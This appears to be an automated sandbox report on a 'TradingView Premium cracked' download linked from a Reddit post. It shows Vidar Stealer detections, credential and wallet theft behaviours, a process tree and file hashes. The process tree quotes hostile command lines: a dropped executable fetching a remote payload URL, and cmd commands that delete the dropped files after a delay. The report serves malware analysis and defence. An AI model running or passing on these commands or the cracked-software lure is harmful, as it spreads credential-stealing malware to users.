Analysis
-
max time kernel
135s -
max time network
140s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
19-10-2024 08:03
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://www.reddit.com/r/Cracked_Software_Hub/comments/1fo875c/tradingview_premium_cracked_version_available_for/
Resource
win10v2004-20241007-en
General
-
Target
https://www.reddit.com/r/Cracked_Software_Hub/comments/1fo875c/tradingview_premium_cracked_version_available_for/
Malware Config
Signatures
-
Detect Vidar Stealer 2 IoCs
resource yara_rule behavioral1/memory/4184-398-0x0000000000150000-0x00000000014A9000-memory.dmp family_vidar_v7 behavioral1/memory/4184-487-0x0000000000150000-0x00000000014A9000-memory.dmp family_vidar_v7 -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation HJJDGH.exe -
Executes dropped EXE 11 IoCs
pid Process 2776 HJJDGH.exe 6096 HJJDGH.exe 3348 HJJDGH.exe 5984 HJJDGH.exe 4792 HJJDGH.exe 4688 HJJDGH.exe 6112 HJJDGH.exe 4276 HJJDGH.exe 2008 HJJDGH.exe 1072 HJJDGH.exe 1716 HJJDGH.exe -
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TradingView Premium Desktop.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 TradingView Premium Desktop.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString TradingView Premium Desktop.exe -
Delays execution with timeout.exe 2 IoCs
pid Process 5824 timeout.exe 2584 timeout.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings msedge.exe -
Suspicious behavior: EnumeratesProcesses 22 IoCs
pid Process 2300 msedge.exe 2300 msedge.exe 1492 msedge.exe 1492 msedge.exe 4988 identity_helper.exe 4988 identity_helper.exe 5616 msedge.exe 5616 msedge.exe 4184 TradingView Premium Desktop.exe 4184 TradingView Premium Desktop.exe 4184 TradingView Premium Desktop.exe 4184 TradingView Premium Desktop.exe 4184 TradingView Premium Desktop.exe 4184 TradingView Premium Desktop.exe 4184 TradingView Premium Desktop.exe 4184 TradingView Premium Desktop.exe 4184 TradingView Premium Desktop.exe 4184 TradingView Premium Desktop.exe 4980 msedge.exe 4980 msedge.exe 4980 msedge.exe 4980 msedge.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 9 IoCs
pid Process 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe -
Suspicious use of FindShellTrayWindow 51 IoCs
pid Process 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe -
Suspicious use of SendNotifyMessage 24 IoCs
pid Process 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1492 wrote to memory of 708 1492 msedge.exe 84 PID 1492 wrote to memory of 708 1492 msedge.exe 84 PID 1492 wrote to memory of 5008 1492 msedge.exe 85 PID 1492 wrote to memory of 5008 1492 msedge.exe 85 PID 1492 wrote to memory of 5008 1492 msedge.exe 85 PID 1492 wrote to memory of 5008 1492 msedge.exe 85 PID 1492 wrote to memory of 5008 1492 msedge.exe 85 PID 1492 wrote to memory of 5008 1492 msedge.exe 85 PID 1492 wrote to memory of 5008 1492 msedge.exe 85 PID 1492 wrote to memory of 5008 1492 msedge.exe 85 PID 1492 wrote to memory of 5008 1492 msedge.exe 85 PID 1492 wrote to memory of 5008 1492 msedge.exe 85 PID 1492 wrote to memory of 5008 1492 msedge.exe 85 PID 1492 wrote to memory of 5008 1492 msedge.exe 85 PID 1492 wrote to memory of 5008 1492 msedge.exe 85 PID 1492 wrote to memory of 5008 1492 msedge.exe 85 PID 1492 wrote to memory of 5008 1492 msedge.exe 85 PID 1492 wrote to memory of 5008 1492 msedge.exe 85 PID 1492 wrote to memory of 5008 1492 msedge.exe 85 PID 1492 wrote to memory of 5008 1492 msedge.exe 85 PID 1492 wrote to memory of 5008 1492 msedge.exe 85 PID 1492 wrote to memory of 5008 1492 msedge.exe 85 PID 1492 wrote to memory of 5008 1492 msedge.exe 85 PID 1492 wrote to memory of 5008 1492 msedge.exe 85 PID 1492 wrote to memory of 5008 1492 msedge.exe 85 PID 1492 wrote to memory of 5008 1492 msedge.exe 85 PID 1492 wrote to memory of 5008 1492 msedge.exe 85 PID 1492 wrote to memory of 5008 1492 msedge.exe 85 PID 1492 wrote to memory of 5008 1492 msedge.exe 85 PID 1492 wrote to memory of 5008 1492 msedge.exe 85 PID 1492 wrote to memory of 5008 1492 msedge.exe 85 PID 1492 wrote to memory of 5008 1492 msedge.exe 85 PID 1492 wrote to memory of 5008 1492 msedge.exe 85 PID 1492 wrote to memory of 5008 1492 msedge.exe 85 PID 1492 wrote to memory of 5008 1492 msedge.exe 85 PID 1492 wrote to memory of 5008 1492 msedge.exe 85 PID 1492 wrote to memory of 5008 1492 msedge.exe 85 PID 1492 wrote to memory of 5008 1492 msedge.exe 85 PID 1492 wrote to memory of 5008 1492 msedge.exe 85 PID 1492 wrote to memory of 5008 1492 msedge.exe 85 PID 1492 wrote to memory of 5008 1492 msedge.exe 85 PID 1492 wrote to memory of 5008 1492 msedge.exe 85 PID 1492 wrote to memory of 2300 1492 msedge.exe 86 PID 1492 wrote to memory of 2300 1492 msedge.exe 86 PID 1492 wrote to memory of 3976 1492 msedge.exe 87 PID 1492 wrote to memory of 3976 1492 msedge.exe 87 PID 1492 wrote to memory of 3976 1492 msedge.exe 87 PID 1492 wrote to memory of 3976 1492 msedge.exe 87 PID 1492 wrote to memory of 3976 1492 msedge.exe 87 PID 1492 wrote to memory of 3976 1492 msedge.exe 87 PID 1492 wrote to memory of 3976 1492 msedge.exe 87 PID 1492 wrote to memory of 3976 1492 msedge.exe 87 PID 1492 wrote to memory of 3976 1492 msedge.exe 87 PID 1492 wrote to memory of 3976 1492 msedge.exe 87 PID 1492 wrote to memory of 3976 1492 msedge.exe 87 PID 1492 wrote to memory of 3976 1492 msedge.exe 87 PID 1492 wrote to memory of 3976 1492 msedge.exe 87 PID 1492 wrote to memory of 3976 1492 msedge.exe 87 PID 1492 wrote to memory of 3976 1492 msedge.exe 87 PID 1492 wrote to memory of 3976 1492 msedge.exe 87 PID 1492 wrote to memory of 3976 1492 msedge.exe 87 PID 1492 wrote to memory of 3976 1492 msedge.exe 87 PID 1492 wrote to memory of 3976 1492 msedge.exe 87 PID 1492 wrote to memory of 3976 1492 msedge.exe 87
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.reddit.com/r/Cracked_Software_Hub/comments/1fo875c/tradingview_premium_cracked_version_available_for/1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1492 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff0ac646f8,0x7fff0ac64708,0x7fff0ac647182⤵PID:708
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2044,3575648593463468573,12469310650796504437,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2064 /prefetch:22⤵PID:5008
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2044,3575648593463468573,12469310650796504437,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:2300
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2044,3575648593463468573,12469310650796504437,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2888 /prefetch:82⤵PID:3976
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,3575648593463468573,12469310650796504437,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3324 /prefetch:12⤵PID:1144
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,3575648593463468573,12469310650796504437,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3348 /prefetch:12⤵PID:1216
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,3575648593463468573,12469310650796504437,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5176 /prefetch:12⤵PID:4064
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2044,3575648593463468573,12469310650796504437,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5480 /prefetch:82⤵PID:2612
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2044,3575648593463468573,12469310650796504437,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5480 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4988
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,3575648593463468573,12469310650796504437,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5756 /prefetch:12⤵PID:4584
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2044,3575648593463468573,12469310650796504437,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5880 /prefetch:82⤵PID:5016
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,3575648593463468573,12469310650796504437,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5960 /prefetch:12⤵PID:4848
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,3575648593463468573,12469310650796504437,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6512 /prefetch:12⤵PID:5248
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,3575648593463468573,12469310650796504437,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6444 /prefetch:12⤵PID:5256
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,3575648593463468573,12469310650796504437,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6120 /prefetch:12⤵PID:5416
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,3575648593463468573,12469310650796504437,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6060 /prefetch:12⤵PID:5424
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2044,3575648593463468573,12469310650796504437,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6484 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:5616
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2044,3575648593463468573,12469310650796504437,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5188 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
PID:4980
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:548
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:3164
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:5880
-
C:\Users\Admin\Downloads\TradingView_Premium_Desktop\TradingView_Premium_Desktop_(password_github)\TradingView Premium Desktop.exe"C:\Users\Admin\Downloads\TradingView_Premium_Desktop\TradingView_Premium_Desktop_(password_github)\TradingView Premium Desktop.exe"1⤵
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:4184 -
C:\ProgramData\HJJDGH.exeC:\ProgramData\\HJJDGH.exe https://apklight.com/clips.exe2⤵
- Checks computer location settings
- Executes dropped EXE
PID:2776 -
C:\ProgramData\HJJDGH.exeC:\ProgramData\HJJDGH.exe3⤵
- Executes dropped EXE
PID:6096
-
-
C:\ProgramData\HJJDGH.exeC:\ProgramData\HJJDGH.exe3⤵
- Executes dropped EXE
PID:3348
-
-
C:\ProgramData\HJJDGH.exeC:\ProgramData\HJJDGH.exe3⤵
- Executes dropped EXE
PID:5984
-
-
C:\ProgramData\HJJDGH.exeC:\ProgramData\HJJDGH.exe3⤵
- Executes dropped EXE
PID:4792
-
-
C:\ProgramData\HJJDGH.exeC:\ProgramData\HJJDGH.exe3⤵
- Executes dropped EXE
PID:4688
-
-
C:\ProgramData\HJJDGH.exeC:\ProgramData\HJJDGH.exe3⤵
- Executes dropped EXE
PID:6112
-
-
C:\ProgramData\HJJDGH.exeC:\ProgramData\HJJDGH.exe3⤵
- Executes dropped EXE
PID:4276
-
-
C:\ProgramData\HJJDGH.exeC:\ProgramData\HJJDGH.exe3⤵
- Executes dropped EXE
PID:2008
-
-
C:\ProgramData\HJJDGH.exeC:\ProgramData\HJJDGH.exe3⤵
- Executes dropped EXE
PID:1072
-
-
C:\ProgramData\HJJDGH.exeC:\ProgramData\HJJDGH.exe3⤵
- Executes dropped EXE
PID:1716
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\ProgramData\HJJDGH.exe" & exit3⤵PID:2508
-
C:\Windows\system32\timeout.exetimeout /t 104⤵
- Delays execution with timeout.exe
PID:5824
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\IEHCAKKJDBKK" & exit2⤵
- System Location Discovery: System Language Discovery
PID:1276 -
C:\Windows\SysWOW64\timeout.exetimeout /t 103⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:2584
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
7KB
MD51fbd01ee768b7c4abfd2783a4707a072
SHA115288415ec755c2673da3c716386abfdd35aaaed
SHA2560a6b558dc092b4f6bce802a6407fe468f7b973c82db36e2d7a0d0db5635838b4
SHA512200e9ddc345d9a9014e4b8db1db4647ab247491de20deea02ee65a032f62c67cf46fa46fff19b2e2059ba9274a24d9ad12c55b14af9da2ccfb355a40875a8c5d
-
Filesize
152B
MD50a9dc42e4013fc47438e96d24beb8eff
SHA1806ab26d7eae031a58484188a7eb1adab06457fc
SHA25658d66151799526b3fa372552cd99b385415d9e9a119302b99aadc34dd51dd151
SHA512868d6b421ae2501a519595d0c34ddef25b2a98b082c5203da8349035f1f6764ddf183197f1054e7e86a752c71eccbc0649e515b63c55bc18cf5f0592397e258f
-
Filesize
152B
MD561cef8e38cd95bf003f5fdd1dc37dae1
SHA111f2f79ecb349344c143eea9a0fed41891a3467f
SHA256ae671613623b4477fbd5daf1fd2d148ae2a09ddcc3804b2b6d4ffcb60b317e3e
SHA5126fb9b333fe0e8fde19fdd0bd01a1990a4e60a87c0a02bc8297da1206e42f8690d06b030308e58c862e9e77714a585eed7cc1627590d99a10aeb77fc0dd3d864d
-
Filesize
215KB
MD50e3d96124ecfd1e2818dfd4d5f21352a
SHA1098b1aa4b26d3c77d24dc2ffd335d2f3a7aeb5d7
SHA256eef545efdb498b725fbabeedd5b80cec3c60357df9bc2943cfd7c8d5ae061dcc
SHA512c02d65d901e26d0ed28600fa739f1aa42184e00b4e9919f1e4e9623fe9d07a2e2c35b0215d4f101afc1e32fc101a200ca4244eb1d9ca846065d387144451331c
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize4KB
MD57fca31e2be8d522833cee88b847293a5
SHA1f9c9648fe4e77c724277427c54df245d27a405f5
SHA2568f9ec698286fabaa171b36b9fd022171616d146036a7f0680cab63ee7125f5ac
SHA512c3258ccd66458f3e335ba8b2cf793bbd98a9f91c56f3c83aeb4a967b14a799f7ca638b33d2166ac971f21dee5d9bbbc13b8d760817dbf31a226df0ce634c3c5b
-
Filesize
20KB
MD5b0f47e9673a1a180755cc333f3266d30
SHA1b2299fba1e5bac6f05ffb2fc8e01a6c84b016a0a
SHA256f00939e7eebb6fd29ed0726cdb0c7bb912ff59ce78def67e535e023fae4124ac
SHA512e1560353aec22894e5328a3c22655783b923c03f7dd4b0bbcd6a22d6e910c60ac388917717587c053987a6359437e25e3baa6b3e22ab181a91d55728954f6ce3
-
Filesize
124KB
MD52ac82a4f9d464915826d7887de1cd817
SHA1da6d8cc624664bd7977b3e48543a90637adcc9c8
SHA25619d1bdf82a963d394d3e7ac4e8023913ade4f4c5aa012a7edc0a05745fafe7c2
SHA51225df0eb8318257ada11a918ec27c32f8d972ad0cbb2929912cebb8f1da8fbe175065db05ed324e4d21d6828648aed1d2519bdff2ef6530d5433cbfb32bcca377
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_www.reddit.com_0.indexeddb.leveldb\CURRENT
Filesize16B
MD546295cac801e5d4857d09837238a6394
SHA144e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA2560f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA5128969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23
-
Filesize
1KB
MD58277bab8df30add5321c4d288a27a3be
SHA196a91aa10dbe2c644acd6ac13690bf5de414eace
SHA256840c5043279bcf8490e9754d89b74361b19ba9712bc7a4a9acf51cd4519664a6
SHA5121532c2182db5ebaa5eb89728bab38a45e463cc0bf5cbd9cb0f7d79d4bf4dce0dcff4fd75fed50e120fffa9ab9166a103ff28e992a1e12f65c0e5c11970d839c1
-
Filesize
1KB
MD57bc40d5a7c3b3ad20b4d21ef0ead8677
SHA1adacbb0b32e0e1471fd84a44da06c2b44629b38b
SHA2561aeafb25c96a086da5e74da8c7d64a0b0a91f83ee842028ca6cbb070f7598c36
SHA512b689886c455ab84f94cf63fc159c833f0f6569994414658ec48b6eda86e8e1a21771483f21ccffdaf5fb659d59433625d66bbac48692e3230298647f2bc4f337
-
Filesize
7KB
MD54196195f638bb483599fbbe47b1671a6
SHA1f0f33132333bdab6c3ea4a7a6a2ff8654e357854
SHA2569517e80c6dbb31a82ce8061d13d4811b3f21d88e62165098d933568d2adbe4b8
SHA5123fdbda39e8e538743d12f21215459e08d90e4d267f37197db4a59ed42d103c6cc913102d56cc70ddeb935ca452569e3cc7b7b95babce4e3cc7a54094bc518c2b
-
Filesize
7KB
MD50b7a69ff1658f92e71b43b58db6b50ee
SHA1ee3448b8aece08ae0166c5a55942ebc2ac75a16f
SHA2564da400fc9d3bce59ae904b19e03be72304e1035b6f9989f19e1b1a961e3a2759
SHA5125c5ae71d8a3b81535b4a2e846e4c2f95fa011d3be2066437ba13a37e4a216af4dc841eb6adb67e859cea20821917aefe0c2ff1deb7ff704499ca0bb62c2bf2b8
-
Filesize
5KB
MD55044a0bf8d3793d33f60fdbe04498282
SHA1d7b604ac4424091619e7eaa8be8db08ca555f639
SHA256365832a6c2d7aa243acf48342d782c7ff336492eb003b5bb26f9bf1b82f1e721
SHA512228b1c5e33f78d2bb69e79257f8478559f27ea55b1499293f0c67cb89222680990eefe60afa7a58209846ae2ebde3f472c3014161337d3e638865c69323196a0
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index
Filesize72B
MD566173adc33e12e82b041247623454166
SHA1e6ab64fc31e32e6ecd344426b0f1d5523a7cc3cf
SHA256b2005a3fe2b119f580d7345d17f27a0b4aa3b80478ff4b3723da34c1204b69b5
SHA5129b265431f3f95850d09f4f789407203528654b85a453be49abfb032e34c7e3212a2378e83d3926b76a3e94ee756cb088be9cbe322436e6bad3125e730f504d27
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe57d205.TMP
Filesize48B
MD54c9b49fa9d3bc38039f1239dce2bce3d
SHA18572e33d248e7481bfd81a2a5254984c80a1db4a
SHA2565ad85a8ad228dc413c46aec450e93bb1f8ac9c7134cfb1c128bddb141c087b2e
SHA51285431a930208f4de2ed053e79d2ef93b8bc4dda6d34c6d8508c11faa525402e38e10b0093a4e524df9dccb57a3c282c930e49073f08d00f7bf8fe736aa439159
-
Filesize
537B
MD53e7548b8a316220fa95a47a30e2d6f55
SHA1850b2615b91649f99d7990020469035545dc45c1
SHA256994b6bee06454106f8da2b6d752e486e6bd92e36ccb555d56ebecb1c231be9fc
SHA5127251a3fd1e457d31eed2a75e86a3b52606d4c70cc41d82fc528d0e4cbfc5909afda1ff8f6610ae8e172392f3338bab50e51a27c72940a61f34fadf0ab9ca12fe
-
Filesize
537B
MD54b1f719972ae29978a0214f5b4bd9f87
SHA13ac90ec5a96eacf47aca955753e9cc4dfacb0bb0
SHA256c8f959a3f1a12847cebc38f96f5aff7659f086b9aae2e0b30aea51f5d2c5b98a
SHA51242ed80101aee556ce5a443f7d3991d57966ed625bbc87d9ed10c096f291989a9343622236596292790f19044228137f9ebd300c66be5d867e3c5d6ac69c4e37c
-
Filesize
16B
MD56752a1d65b201c13b62ea44016eb221f
SHA158ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA2560861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA5129cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389
-
Filesize
11KB
MD59bca4eeafa396118737e712557746c87
SHA1efb7549d51bb8a2898ee2dbdfe3d8fa74fcb39f2
